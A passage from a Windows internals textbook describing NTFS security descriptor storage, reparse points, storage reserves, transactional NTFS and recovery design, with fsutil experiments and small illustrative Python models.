descriptor a new internal security ID. NTFS internal security IDs are 32-bit values, whereas SIDs are typically
several times larger, so representing SIDs with NTFS security IDs saves space in the $STANDARD_
INFORMATION attribute. NTFS then adds the security descriptor to the end of the $SDS data attribute,
and it adds to the $SDH and $SII indexes entries that reference the descriptor's offset in the $SDS data.
When an application attempts to open a file or directory, NTFS uses the $SII index to look up the file
or directory's security descriptor. NTFS reads the file or directory's internal security ID from the MFT
entry's $STANDARD_INFORMATION attribute. It then uses the $Secure file's $SII index to locate the ID's
entry in the $SDS data attribute. The offset into the $SDS attribute lets NTFS read the security descriptor
and complete the security check. NTFS stores the 32 most recently accessed security descriptors
with their $SII index entries in a cache so that it accesses the $Secure file only when the $SII isn't cached.
NTFS doesn't delete entries in the $Secure file, even if no file or directory on a volume references the
entry. Not deleting these entries doesn't significantly decrease disk space because most volumes, even
those used for long periods, have relatively few unique security descriptors.
NTFS's use of generic B-tree indexing lets files and directories that have the same security settings
efficiently share security descriptors. The $SII index lets NTFS quickly look up a security descriptor in
the $Secure file while performing security checks, and the $SDH index lets NTFS quickly determine
whether a security descriptor being applied to a file or directory is already stored in the $Secure file
and can be shared.
Reparse points
As described earlier in the chapter, a reparse point is a block of up to 16 KB of application-defined
reparse data and a 32-bit reparse tag that are stored in the $REPARSE_POINT attribute of a file or
directory. Whenever an application creates or deletes a reparse point, NTFS updates the \$Extend\$Reparse
metadata file, in which NTFS stores entries that identify the file record numbers of files and directories
that contain reparse points. Storing the records in a central location enables NTFS to provide interfaces
for applications to enumerate all a volume's reparse points or just specific types of reparse points, such
as mount points. The \$Extend\$Reparse file uses the generic B-tree indexing facility of NTFS by collating
the file's entries (in an index named $R) by reparse point tags and file record numbers.
EXPERIMENT: Looking at different reparse points
A file or directory reparse point can contain any kind of arbitrary data. In this experiment, we use
the built-in fsutil.exe tool to analyze the reparse point content of a symbolic link and of a Modern
application’s AppExecutionAlias, similar to the experiment in Chapter 8. First you need to create a
symbolic link:
C:\>mklink test_link.txt d:\Test.txt
symbolic link created for test_link.txt <<===>> d:\Test.txt
Then you can use the fsutil reparsePoint query command to examine the reparse point content:
C:\>fsutil reparsePoint query test_link.txt
Reparse Tag Value : 0xa000000c
Tag value: Microsoft
Tag value: Name Surrogate
Tag value: Symbolic Link
Reparse Data Length: 0x00000040
Reparse Data:
0000: 16 00 1e 00 00 00 16 00 00 00 00 00 64 00 3a 00 ............d.:.
0010: 5c 00 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 \.T.e.s.t...t.x.
0020: 74 00 5c 00 3f 00 3f 00 5c 00 64 00 3a 00 5c 00 t.\.?.?.\.d.:.\.
0030: 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 74 00 T.e.s.t...t.x.t.
As expected, the content is a simple data structure (REPARSE_DATA_BUFFER, documented in
Microsoft Docs), which contains the symbolic link target and the printed file name. You can even
delete the reparse point by using the fsutil reparsePoint delete command:
C:\>more test_link.txt
This is a test file!
C:\>fsutil reparsePoint delete test_link.txt
C:\>more test_link.txt
If you delete the reparse point, the file becomes a 0-byte file. This is by design because the
unnamed data stream ($DATA) in the link file is empty. You can repeat the experiment with an
AppExecutionAlias of an installed Modern application (in the following example, Spotify was used):
C:\>cd C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps
C:\Users\andrea\AppData\Local\Microsoft\WindowsApps>fsutil reparsePoint query Spotify.exe
Reparse Tag Value : 0x8000001b
Tag value: Microsoft
Reparse Data Length: 0x00000178
Reparse Data:
0000: 03 00 00 00 53 00 70 00 6f 00 74 00 69 00 66 00 ....S.p.o.t.i.f.
0010: 79 00 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 y.A.B...S.p.o.t.
0020: 69 00 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 i.f.y.M.u.s.i.c.
0030: 5f 00 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 _.z.p.d.n.e.k.d.
0040: 72 00 7a 00 72 00 65 00 61 00 30 00 00 00 53 00 r.z.r.e.a.0...S
0050: 70 00 6f 00 74 00 69 00 66 00 79 00 41 00 42 00 p.o.t.i.f.y.A.B.
0060: 2e 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00 ..S.p.o.t.i.f.y.
0070: 4d 00 75 00 73 00 69 00 63 00 5f 00 7a 00 70 00 M.u.s.i.c._.z.p.
0080: 64 00 6e 00 65 00 6b 00 64 00 72 00 7a 00 72 00 d.n.e.k.d.r.z.r.
0090: 65 00 61 00 30 00 21 00 53 00 70 00 6f 00 74 00 e.a.0.!.S.p.o.t.
00a0: 69 00 66 00 79 00 00 00 43 00 3a 00 5c 00 50 00 i.f.y...C.:.\.P.
00b0: 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 r.o.g.r.a.m. .F.
00c0: 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 i.l.e.s.\.W.i.n.
00d0: 64 00 6f 00 77 00 73 00 41 00 70 00 70 00 73 00 d.o.w.s.A.p.p.s.
00e0: 5c 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00 \.S.p.o.t.i.f.y.
00f0: 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 69 00 A.B...S.p.o.t.i.
0100: 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 5f 00 f.y.M.u.s.i.c._.
0110: 31 00 2e 00 39 00 34 00 2e 00 32 00 36 00 32 00 1...9.4...2.6.2.
0120: 2e 00 30 00 5f 00 78 00 38 00 36 00 5f 00 5f 00 ..0._.x.8.6._._.
0130: 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 72 00 z.p.d.n.e.k.d.r.
0140: 7a 00 72 00 65 00 61 00 30 00 5c 00 53 00 70 00 z.r.e.a.0.\.S.p.
0150: 6f 00 74 00 69 00 66 00 79 00 4d 00 69 00 67 00 o.t.i.f.y.M.i.g.
0160: 72 00 61 00 74 00 6f 00 72 00 2e 00 65 00 78 00 r.a.t.o.r...e.x.
0170: 65 00 00 00 30 00 00 00 e...0...
From the preceding output, we can see another kind of reparse point, the AppExecutionAlias,
used by Modern applications. More information is available in Chapter 8.
Storage reserves and NTFS reservations
Windows Update and the Windows Setup application must be able to correctly apply important se-
curity updates, even when the system volume is almost full (they need to ensure that there is enough
disk space). Windows 10 introduced Storage Reserves as a way to achieve this goal. Before we de-
scribe the Storage Reserves, it is necessary that you understand how NTFS reservations work and why
they’re needed.
When the NTFS file system mounts a volume, it calculates the volume’s in-use and free space. No
on-disk attributes exist for keeping track of these two counters; NTFS maintains and stores the Volume
bitmap on disk, which represents the state of all the clusters in the volume. The NTFS mounting code
scans the bitmap and counts the number of used clusters, which have their bit set to 1 in the bitmap,
686
CHAPTER 11
Caching and file systems
and, through a simple equation (total number of clusters of the volume minus the number of used
ones), calculates the number of free clusters. The two calculated counters are stored in the volume con-
trol block (VCB) data structure, which represents the mounted volume and exists only in memory until
the volume is dismounted.
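The mount-time scan and the "simple equation" above can be sketched in a few lines. The following is an illustrative model only: the bitmap is a plain byte string rather than the real $Bitmap file format, and the VCB is reduced to two counters.

```python
# Illustrative model of NTFS's mount-time free-cluster computation.
# The real volume bitmap is the $Bitmap metadata file; here it is just
# a bytes object in which bit N set to 1 means cluster N is in use.

def count_used_clusters(bitmap: bytes, total_clusters: int) -> int:
    """Scan the bitmap and count the bits that are set to 1."""
    used = 0
    for n in range(total_clusters):
        byte, bit = divmod(n, 8)
        if (bitmap[byte] >> bit) & 1:
            used += 1
    return used

# Hypothetical 16-cluster volume with clusters 0-4 and 9 in use.
bitmap = bytes([0b00011111, 0b00000010])
total = 16
used = count_used_clusters(bitmap, total)
free = total - used   # the "simple equation" from the text
print(used, free)     # these counters would then be cached in the VCB
```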
During normal volume I/O activity, NTFS must maintain the total number of reserved clusters. This
counter needs to exist for the following reasons:
- When writing to compressed and sparse files, the system must ensure that the entire file is writable because an application that is operating on this kind of file could potentially store valid uncompressed data on the entire file.
- The first time a writable image-backed section is created, the file system must reserve available space for the entire section size, even if no physical space has yet been allocated in the volume.
- The USN Journal and TxF use the counter to ensure that there is space available for the USN log and NTFS transactions.
NTFS maintains another counter during normal I/O activities, Total Free Available Space, which is the
final space that a user can see and use for storing new files or data. These three concepts are parts of
NTFS Reservations. The important characteristic of NTFS Reservations is that the counters are only in-
memory volatile representations, which will be destroyed at volume dismounting time.
Storage Reserve is a feature based on NTFS reservations, which allows files to have an assigned
Storage Reserve area. Storage Reserve defines 15 different reservation areas (2 of which are reserved by
the OS), which are defined and stored both in memory and in the NTFS on-disk data structures.
To use the new on-disk reservations, an application defines a volume’s Storage Reserve area by
using the FSCTL_QUERY_STORAGE_RESERVE file system control code, which specifies, through a data
structure, the total amount of reserved space and an Area ID. This will update multiple counters in the
VCB (Storage Reserve areas are maintained in-memory) and insert new data in the $SRAT named data
stream of the $Bitmap metadata file. The $SRAT data stream contains a data structure that tracks each
Reserve area, including the number of reserved and used clusters. An application can query informa-
tion about Storage Reserve areas through the FSCTL_QUERY_STORAGE_RESERVE file system control
code and can delete a Storage Reserve using the FSCTL_DELETE_STORAGE_RESERVE code.
After a Storage Reserve area is defined, the application is guaranteed that the space will no lon-
ger be used by any other components. Applications can then assign files and directories to a Storage
Reserve area using the NtSetInformationFile native API with the FileStorageReserveIdInformationEx in-
formation class. The NTFS file system driver manages the request by updating the in-memory reserved
and used clusters counters of the Reserve area, and by updating the volume’s total number of reserved
clusters that belong to NTFS reservations. It also stores and updates the on-disk STANDARD_INFO at-
tribute of the target file. The latter maintains 4 bits to store the Storage Reserve area ID. In this way, the
system is able to quickly enumerate each file that belongs to a reserve area by just parsing MFT entries.
(NTFS implements the enumeration in the FSCTL_QUERY_FILE_LAYOUT code’s dispatch function.) A
user can enumerate the files that belong to a Storage Reserve by using the fsutil storageReserve
findById command, specifying the volume path name and the Storage Reserve ID she is interested in.
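The quick enumeration described above works because the reserve ID is a small field parsed out of every file record. A simplified sketch follows; the (name, flags) entries and the `files_in_reserve` helper are hypothetical stand-ins for the real MFT layout, with only the 4-bit ID packing taken from the text.

```python
# Simplified sketch of enumerating files by Storage Reserve area ID.
# The real ID occupies 4 bits of the on-disk $STANDARD_INFORMATION
# attribute; here each "MFT entry" is a hypothetical (name, flags)
# pair with the reserve ID packed into the low 4 bits of the flags.

RESERVE_ID_MASK = 0xF

def reserve_id(flags: int) -> int:
    return flags & RESERVE_ID_MASK

def files_in_reserve(mft_entries, wanted_id):
    """Enumerate by parsing every entry, as the FSCTL_QUERY_FILE_LAYOUT
    dispatch does, rather than keeping per-reserve file lists."""
    return [name for name, flags in mft_entries
            if reserve_id(flags) == wanted_id]

entries = [("pagefile.sys", 0x20 | 1),   # Hard reserve (ID 1)
           ("update.cab",   0x20 | 2),   # Soft reserve (ID 2)
           ("notes.txt",    0x20 | 0)]   # no reserve
print(files_in_reserve(entries, 2))     # ['update.cab']
```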
Several basic file operations have new side effects due to Storage Reserves, like file creation and
renaming. Newly created files or directories will automatically inherit the storage reserve ID of their
parent; the same applies for files or directories that get renamed (moved) to a new parent. Since a
rename operation can change the Storage Reserve ID of the file or directory, this implies that the op-
eration might fail due to lack of disk space. Moving a nonempty directory to a new parent implies that
the new Storage Reserve ID is recursively applied to all the files and subdirectories. When the reserved
space of a Storage Reserve ends, the system starts to use the volume’s free available space, so there is
no guarantee that the operation always succeeds.
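The recursive re-tagging and the space caveat can be modeled as follows. This is a toy sketch with made-up structures, not NTFS's actual bookkeeping; the single `available_bytes` parameter lumps together the reserve's remaining space and the volume's free space, which NTFS spills into once the reserve is exhausted.

```python
# Toy sketch of the rename side effect: moving a directory tree under
# a parent with a different Storage Reserve ID recursively re-tags
# every node. The move fails only when neither the reserve nor the
# volume's free space can absorb the tree, matching the "no guarantee"
# caveat above. All structures here are hypothetical, not NTFS's own.

class Node:
    def __init__(self, name, size=0, children=()):
        self.name, self.size = name, size
        self.reserve_id = 0
        self.children = list(children)

def total_size(node):
    return node.size + sum(total_size(c) for c in node.children)

def move_into_reserve(node, new_id, available_bytes):
    """available_bytes models the reserve's remaining space plus the
    volume's free space, which NTFS spills into once the reserve ends."""
    if total_size(node) > available_bytes:
        raise OSError("not enough space for the new Storage Reserve ID")
    node.reserve_id = new_id
    for child in node.children:
        move_into_reserve(child, new_id, available_bytes)

tree = Node("Logs", children=[Node("a.evtx", 70_000), Node("b.evtx", 30_000)])
move_into_reserve(tree, 2, 1_000_000)
print(tree.reserve_id, [c.reserve_id for c in tree.children])   # 2 [2, 2]
```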
EXPERIMENT: Witnessing storage reserves
Starting from the May 2019 Update of Windows 10 (19H1), you can look at the existing NTFS
reserves through the built-in fsutil.exe tool:
C:\>fsutil storagereserve query c:

Reserve ID:         1
Flags:              0x00000000
Space Guarantee:    0x0    (0 MB)
Space Used:         0x0    (0 MB)

Reserve ID:         2
Flags:              0x00000000
Space Guarantee:    0x0    (0 MB)
Space Used:         0x199ed000    (409 MB)
Windows Setup defines two NTFS reserves: a Hard reserve (ID 1), used by the Setup applica-
tion to store its files, which can’t be deleted or replaced by other applications, and a Soft reserve
(ID 2), which is used to store temporary files, like system logs and Windows Update downloaded
files. In the preceding example, the Setup application has already been able to install all its files
(and no Windows Update is executing), so the Hard Reserve is empty; the Soft reserve has all its
reserved space allocated. You can enumerate all the files that belong to the reserve using the
fsutil storagereserve findById command. (Be aware that the output is very large, so you might
consider redirecting the output to a file using the > operator.)
C:\>fsutil storagereserve findbyid c: 2
...
********* File 0x0002000000018762 *********
File reference number : 0x0002000000018762
File attributes       : 0x00000020: Archive
File entry flags      : 0x00000000
Link (ParentID: Name) : 0x0001000000001165: NTFS Name : Windows\System32\winevt\Logs\OAlerts.evtx
Link (ParentID: Name) : 0x0001000000001165: DOS Name  : OALERT~1.EVT
Creation Time         : 12/9/2018 3:26:55
Last Access Time      : 12/10/2018 0:21:57
Last Write Time       : 12/10/2018 0:21:57
Change Time           : 12/10/2018 0:21:57
LastUsn               : 44,846,752
OwnerId               : 0
SecurityId            : 551
StorageReserveId      : 2
Stream                : 0x010 ::$STANDARD_INFORMATION
    Attributes        : 0x00000000: *NONE*
    Flags             : 0x0000000c: Resident | No clusters allocated
    Size              : 72
    Allocated Size    : 72
Stream                : 0x030 ::$FILE_NAME
    Attributes        : 0x00000000: *NONE*
    Flags             : 0x0000000c: Resident | No clusters allocated
    Size              : 90
    Allocated Size    : 96
Stream                : 0x030 ::$FILE_NAME
    Attributes        : 0x00000000: *NONE*
    Flags             : 0x0000000c: Resident | No clusters allocated
    Size              : 90
    Allocated Size    : 96
Stream                : 0x080 ::$DATA
    Attributes        : 0x00000000: *NONE*
    Flags             : 0x00000000: *NONE*
    Size              : 69,632
    Allocated Size    : 69,632
    Extents           : 1 Extents
                      : 1: VCN: 0 Clusters: 17 LCN: 3,820,235
Transaction support
By leveraging the Kernel Transaction Manager (KTM) support in the kernel, as well as the facilities pro-
vided by the Common Log File System, NTFS implements a transactional model called transactional NTFS
or TxF. TxF provides a set of user-mode APIs that applications can use for transacted operations on their
files and directories and also a file system control (FSCTL) interface for managing its resource managers.
Note Windows Vista added the support for TxF as a means to introduce atomic transac-
tions to Windows. The NTFS driver was modified without actually changing the format of
the NTFS data structures, which is why the NTFS format version number, 3.1, is the same as it
has been since Windows XP and Windows Server 2003. TxF achieves backward compatibility
by reusing the attribute type (LOGGED_UTILITY_STREAM) that was previously used only for
EFS support instead of adding a new one.
TxF is a powerful API, but due to its complexity and the various issues that developers need to consider,
it has been adopted by only a small number of applications. At the time of this writing, Microsoft is
considering deprecating TxF APIs in a future version of Windows. For the sake of completeness, we present
only a general overview of the TxF architecture in this book.
The overall architecture for TxF, shown in Figure 11-54, uses several components:
- Transacted APIs implemented in the Kernel32.dll library
- A library for reading TxF logs (%SystemRoot%\System32\Txfw32.dll)
- A COM component for TxF logging functionality (%SystemRoot%\System32\Txflog.dll)
- The transactional NTFS library inside the NTFS driver
- The CLFS infrastructure for reading and writing log records
[Figure: TxF components — user mode: Application, Transacted APIs, TxF library, CLFS library; kernel mode: NTFS driver, CLFS driver]
FIGURE 11-54 TxF architecture.
Isolation
Although transactional file operations are opt-in, just like the transactional registry (TxR) operations
described in Chapter 10, TxF has an effect on regular applications that are not transaction-aware
because it ensures that the transactional operations are isolated. For example, if an antivirus program
is scanning a file that’s currently being modified by another application via a transacted operation,
TxF must ensure that the scanner reads the pretransaction data, while applications that access the file
within the transaction work with the modified data. This model is called read-committed isolation.
Read-committed isolation involves the concept of transacted writers and transacted readers. The
former always view the most up-to-date version of a file, including all changes made by the transaction
that is currently associated with the file. At any given time, there can be only one transacted writer for
a file, which means that its write access is exclusive. Transacted readers, on the other hand, have access
only to the committed version of the file at the time they open the file. They are therefore isolated from
changes made by transacted writers. This allows for readers to have a consistent view of a file, even
when a transacted writer commits its changes. To see the updated data, the transacted reader must
open a new handle to the modified file.
Nontransacted writers, on the other hand, are prevented from opening the file by both transacted
writers and transacted readers, so they cannot make changes to the file without being part of the
transaction. Nontransacted readers act similarly to transacted readers in that they see only the file
contents that were last committed when the file handle was open. Unlike transacted readers, however,
they do not receive read-committed isolation, and as such they always receive the updated view of the
latest committed version of a transacted file without having to open a new file handle. This allows non-
transaction-aware applications to behave as expected.
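The read-committed rules above can be condensed into a toy model: a single transacted writer, and readers pinned to whatever version was committed when their handle was opened. The `TxFile` class and its methods are invented for illustration; NTFS does not store file versions this way.

```python
# Toy model of TxF read-committed isolation: a single transacted
# writer, and readers pinned to the version that was committed when
# their handle was opened. This mirrors the rules described above;
# it is not how NTFS actually stores file versions.

class TxFile:
    def __init__(self, data=b""):
        self.committed = data   # last committed version
        self.pending = None     # the (single) transacted writer's copy

    def open_reader(self):
        # A transacted reader snapshots the committed data at open time.
        snapshot = self.committed
        return lambda: snapshot

    def tx_write(self, data):
        self.pending = data     # exclusive: one transacted writer only

    def tx_commit(self):
        self.committed, self.pending = self.pending, None

f = TxFile(b"v1")
reader = f.open_reader()      # handle opened before the commit
f.tx_write(b"v2")
f.tx_commit()
print(reader())               # b'v1': must reopen to see the update
print(f.open_reader()())      # b'v2': a new handle sees the commit
```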
To summarize, TxF’s read-committed isolation model has the following characteristics:
- Changes are isolated from transacted readers.
- Changes are rolled back (undone) if the associated transaction is rolled back, if the machine crashes, or if the volume is forcibly dismounted.
- Changes are flushed to disk if the associated transaction is committed.
Transactional APIs
TxF implements transacted versions of the Windows file I/O APIs, which use the suffix Transacted:
- Create APIs: CreateDirectoryTransacted, CreateFileTransacted, CreateHardLinkTransacted, CreateSymbolicLinkTransacted
- Find APIs: FindFirstFileNameTransacted, FindFirstFileTransacted, FindFirstStreamTransacted
- Query APIs: GetCompressedFileSizeTransacted, GetFileAttributesTransacted, GetFullPathNameTransacted, GetLongPathNameTransacted
- Delete APIs: DeleteFileTransacted, RemoveDirectoryTransacted
- Copy and Move/Rename APIs: CopyFileTransacted, MoveFileTransacted
- Set APIs: SetFileAttributesTransacted
In addition, some APIs automatically participate in transacted operations when the file handle they
are passed is part of a transaction, like one created by the CreateFileTransacted API. Table 11-10 lists
Windows APIs that have modified behavior when dealing with a transacted file handle.
TABLE 11-10 API behavior changed by TxF

API Name                                     Change
CloseHandle                                  Transactions aren't committed until all applications close
                                             transacted handles to the file.
CreateFileMapping, MapViewOfFile             Modifications to mapped views of a file part of a transaction
                                             are associated with the transaction themselves.
FindNextFile, ReadDirectoryChanges,          If the file handle is part of a transaction, read-isolation
GetFileInformationByHandle, GetFileSize      rules are applied to these operations.
GetVolumeInformation                         Function returns FILE_SUPPORTS_TRANSACTIONS if the volume
                                             supports TxF.
ReadFile, WriteFile                          Read and write operations to a transacted file handle are
                                             part of the transaction.
SetFileInformationByHandle                   Changes to the FileBasicInfo, FileRenameInfo, FileAllocationInfo,
                                             FileEndOfFileInfo, and FileDispositionInfo classes are transacted
                                             if the file handle is part of a transaction.
SetEndOfFile, SetFileShortName, SetFileTime  Changes are transacted if the file handle is part of a transaction.
On-disk implementation
As shown earlier in Table 11-7, TxF uses the LOGGED_UTILITY_STREAM attribute type to store addi-
tional data for files and directories that are or have been part of a transaction. This attribute is called
TXF_DATA and contains important information that allows TxF to keep active offline data for a file part
of a transaction. The attribute is permanently stored in the MFT; that is, even after the file is no longer
part of a transaction, the stream remains, for reasons explained soon. The major components of the
attribute are shown in Figure 11-55.
[Figure: TXF_DATA attribute fields — file record number of RM root, flags, TxF file ID (TxID), LSN for NTFS metadata, LSN for user data, LSN for directory index, USN index]
FIGURE 11-55 TXF_DATA attribute.
The first field shown is the file record number of the root of the resource manager responsible for
the transaction associated with this file. For the default resource manager, the file record number is 5,
which is the file record number for the root directory (\) in the MFT, as shown earlier in Figure 11-31.
TxF needs this information when it creates an FCB for the file so that it can link it to the correct resource
manager, which in turn needs to create an enlistment for the transaction when a transacted file request
is received by NTFS.
Another important piece of data stored in the TXF_DATA attribute is the TxF file ID, or TxID, and
this explains why TXF_DATA attributes are never deleted. Because NTFS writes file names to its records
when writing to the transaction log, it needs a way to uniquely identify files in the same directory
that may have had the same name. For example, if sample.txt is deleted from a directory in a transac-
tion and later a new file with the same name is created in the same directory (and as part of the same
transaction), TxF needs a way to uniquely identify the two instances of sample.txt. This identification is
provided by a 64-bit unique number, the TxID, that TxF increments when a new file (or an instance of
a file) becomes part of a transaction. Because they can never be reused, TxIDs are permanent, so the
TXF_DATA attribute will never be removed from a file.
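The sample.txt scenario above reduces to a monotonically increasing 64-bit counter. The sketch below illustrates only that property; the starting value and the `enlist` helper are made up for the example.

```python
# Sketch of why TxIDs make same-named files distinguishable in the
# log: a 64-bit counter that only ever increments, so two instances
# of sample.txt in the same directory get distinct, permanent IDs.
# The starting value and the enlist() helper are made up here.
import itertools

_txid = itertools.count(1)   # never reused, never reset

def enlist(path):
    """Assign a unique TxID to a file joining a transaction."""
    return (next(_txid), path)

first  = enlist(r"dir\sample.txt")   # deleted within the transaction
second = enlist(r"dir\sample.txt")   # recreated with the same name
print(first, second)                 # same name, different TxIDs
```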
Last but not least, three CLFS (Common Logging File System) LSNs are stored for each file part of a
transaction. Whenever a transaction is active, such as during create, rename, or write operations, TxF
writes a log record to its CLFS log. Each record is assigned an LSN, and that LSN gets written to the
appropriate field in the TXF_DATA attribute. The first LSN is used to store the log record that identifies
the changes to NTFS metadata in relation to this file. For example, if the standard attributes of a file are
changed as part of a transacted operation, TxF must update the relevant MFT file record, and the LSN
for the log record describing the change is stored. TxF uses the second LSN when the file’s data is modi-
fied. Finally, TxF uses the third LSN when the file name index for the directory requires a change related
to a transaction the file took part in, or when a directory was part of a transaction and received a TxID.
The TXF_DATA attribute also stores internal flags that describe the state information to TxF and the
index of the USN record that was applied to the file on commit. A TxF transaction can span multiple
USN records that may have been partly updated by NTFS’s recovery mechanism (described shortly), so
the index tells TxF how many more USN records must be applied after a recovery.
TxF uses a default resource manager, one for each volume, to keep track of its transactional state.
TxF, however, also supports additional resource managers called secondary resource managers. These
resource managers can be defined by application writers and have their metadata located in any
directory of the application’s choosing, defining their own transactional work units for undo, backup,
restore, and redo operations. Both the default resource manager and secondary resource managers
contain a number of metadata files and directories that describe their current state:
- The $Txf directory, located in the $Extend\$RmMetadata directory, which is where files are linked when they are deleted or overwritten by transactional operations.
- The $Tops, or TxF Old Page Stream (TOPS) file, which contains a default data stream and an alternate data stream called $T. The default stream for the $Tops file contains metadata about the resource manager, such as its GUID, its CLFS log policy, and the LSN at which recovery should start. The $T stream contains file data that is partially overwritten by a transactional writer (as opposed to a full overwrite, which would move the file into the $Txf directory).
- The TxF log files, which are CLFS log files storing transaction records. For the default resource manager, these files are part of the $TxfLog directory, but secondary resource managers can store them anywhere. TxF uses a multiplexed base log file called $TxfLog.blf. The file \$Extend\$RmMetadata\$TxfLog\$TxfLog contains two streams: the KtmLog stream used for Kernel Transaction Manager metadata records, and the TxfLog stream, which contains the TxF log records.
EXPERIMENT: Querying resource manager information
You can use the built-in Fsutil.exe command-line program to query information about the
default resource manager as well as to create, start, and stop secondary resource managers and
configure their logging policies and behaviors. The following command queries information
about the default resource manager, which is identified by the root directory (\):
d:\>fsutil resource info \
Resource Manager Identifier : 81E83020-E6FB-11E8-B862-D89EF33A38A7
KTM Log Path for RM: \Device\HarddiskVolume8\$Extend\$RmMetadata\$TxfLog\$TxfLog::KtmLog
Space used by TOPS: 1 Mb
TOPS free space: 100%
RM State: Active
Running transactions: 0
One phase commits: 0
Two phase commits: 0
System initiated rollbacks: 0
Age of oldest transaction: 00:00:00
Logging Mode: Simple
Number of containers: 2
Container size: 10 Mb
Total log capacity: 20 Mb
Total free log space: 19 Mb
Minimum containers: 2
Maximum containers: 20
Log growth increment: 2 container(s)
Auto shrink: Not enabled
RM prefers availability over consistency.
As mentioned, the fsutil resource command has many options for configuring TxF resource
managers, including the ability to create a secondary resource manager in any directory of your
choice. For example, you can use the fsutil resource create c:\rmtest command to create a
secondary resource manager in the Rmtest directory, followed by the fsutil resource start
c:\rmtest command to initiate it. Note the presence of the $Tops and $TxfLogContainer files
and of the $TxfLog and $Txf directories in this folder.
Logging implementation
As mentioned earlier, each time a change is made to the disk because of an ongoing transaction, TxF
writes a record of the change to its log. TxF uses a variety of log record types to keep track of trans-
actional changes, but regardless of the record type, all TxF log records have a generic header that
contains information identifying the type of the record, the action related to the record, the TxID that
the record applies to, and the GUID of the KTM transaction that the record is associated with.
A redo record specifies how to reapply a change part of a transaction that’s already been committed
to the volume if the transaction has actually never been flushed from cache to disk. An undo record, on
the other hand, specifies how to reverse a change part of a transaction that hasn’t been committed at
the time of a rollback. Some records are redo-only, meaning they don’t contain any equivalent undo
data, whereas other records contain both redo and undo information.
Through the TOPS file, TxF maintains two critical pieces of data, the base LSN and the restart LSN.
The base LSN determines the LSN of the first valid record in the log, while the restart LSN indicates
at which LSN recovery should begin when starting the resource manager. When TxF writes a restart
record, it updates these two values, indicating that changes have been made to the volume and flushed
out to disk—meaning that the file system is fully consistent up to the new restart LSN.
TxF also writes compensating log records or CLRs. These records store the actions that are being
performed during transaction rollback. They’re primarily used to store the undo-next LSN which allows
the recovery process to avoid repeated undo operations by bypassing undo records that have already
been processed, a situation that can happen if the system fails during the recovery phase and has
already performed part of the undo pass. Finally, TxF also deals with prepare records, abort records and
commit records which describe the state of the KTM transactions related to TxF.
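The role of the undo-next LSN in CLRs can be illustrated with a small undo-pass simulation. The record layout, the dictionaries, and the `undo_pass` function are all invented for the example; only the skip-already-undone behavior is taken from the text.

```python
# Sketch of how the undo-next LSN stored in a compensating log record
# (CLR) lets recovery skip undo work already performed before a crash.
# The record layout and names are illustrative, not the TxF format.

def undo_pass(undo_records, clr_undo_next):
    """undo_records maps lsn -> (action, previous_lsn); previous_lsn is
    None at the start of the chain. clr_undo_next maps an undone lsn to
    the undo-next LSN its CLR recorded, so recovery resumes there."""
    performed = []
    lsn = max(undo_records)
    while lsn is not None:
        if lsn in clr_undo_next:
            lsn = clr_undo_next[lsn]   # skip already-undone records
            continue
        action, prev = undo_records[lsn]
        performed.append(action)
        lsn = prev
    return performed

records = {10: ("undo write A", None),
           20: ("undo rename B", 10),
           30: ("undo create C", 20)}
# Before the crash, recovery had already undone record 30 and wrote a
# CLR whose undo-next LSN points at 20; the new pass resumes there.
print(undo_pass(records, {30: 20}))   # ['undo rename B', 'undo write A']
```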
NTFS recovery support
NTFS recovery support ensures that if a power failure or a system failure occurs, no file system opera-
tions (transactions) will be left incomplete, and the structure of the disk volume will remain intact
without the need to run a disk repair utility. The NTFS Chkdsk utility is used to repair catastrophic disk
corruption caused by I/O errors (bad disk sectors, electrical anomalies, or disk failures, for example) or
software bugs. But with the NTFS recovery capabilities in place, Chkdsk is rarely needed.
As mentioned earlier (in the section “Recoverability”), NTFS uses a transaction-processing scheme to
implement recoverability. This strategy ensures a full disk recovery that is also extremely fast (on the order
of seconds) for even the largest disks. NTFS limits its recovery procedures to file system data to ensure
that at the very least the user will never lose a volume because of a corrupted file system; however, unless
an application takes specific action (such as flushing cached files to disk), NTFS’s recovery support doesn’t
guarantee user data to be fully updated if a crash occurs. This is the job of transactional NTFS (TxF).
The following sections detail the transaction-logging scheme NTFS uses to record modifications to
file system data structures and explain how NTFS recovers a volume if the system fails.
Design
NTFS implements the design of a recoverable file system. These file systems ensure volume consistency by
using logging techniques (sometimes called journaling) originally developed for transaction processing.
If the operating system crashes, the recoverable file system restores consistency by executing a recovery
procedure that accesses information that has been stored in a log file. Because the file system has logged
its disk writes, the recovery procedure takes only seconds, regardless of the size of the volume (unlike
in the FAT file system, where the repair time is related to the volume size). The recovery procedure for a
recoverable file system is exact, guaranteeing that the volume will be restored to a consistent state.
A recoverable file system incurs some costs for the safety it provides. Every transaction that alters the
volume structure requires that one record be written to the log file for each of the transaction’s sub-
operations. This logging overhead is ameliorated by the file system’s batching of log records—writing
many records to the log file in a single I/O operation. In addition, the recoverable file system can employ
the optimization techniques of a lazy write file system. It can even increase the length of the intervals
between cache flushes because the file system metadata can be recovered if the system crashes before
the cache changes have been flushed to disk. This gain over the caching performance of lazy write file
systems makes up for, and often exceeds, the overhead of the recoverable file system’s logging activity.
Neither careful write nor lazy write file systems guarantee protection of user file data. If the system
crashes while an application is writing a file, the file can be lost or corrupted. Worse, the crash can cor-
rupt a lazy write file system, destroying existing files or even rendering an entire volume inaccessible.
The NTFS recoverable file system implements several strategies that improve its reliability over that
of the traditional file systems. First, NTFS recoverability guarantees that the volume structure won’t
be corrupted, so all files will remain accessible after a system failure. Second, although NTFS doesn’t
guarantee protection of user data in the event of a system crash—some changes can be lost from the
cache—applications can take advantage of the NTFS write-through and cache-flushing capabilities to
ensure that file modifications are recorded on disk at appropriate intervals.
Both cache write-through—forcing write operations to be immediately recorded on disk—and
cache flushing—forcing cache contents to be written to disk—are efficient operations. NTFS doesn’t
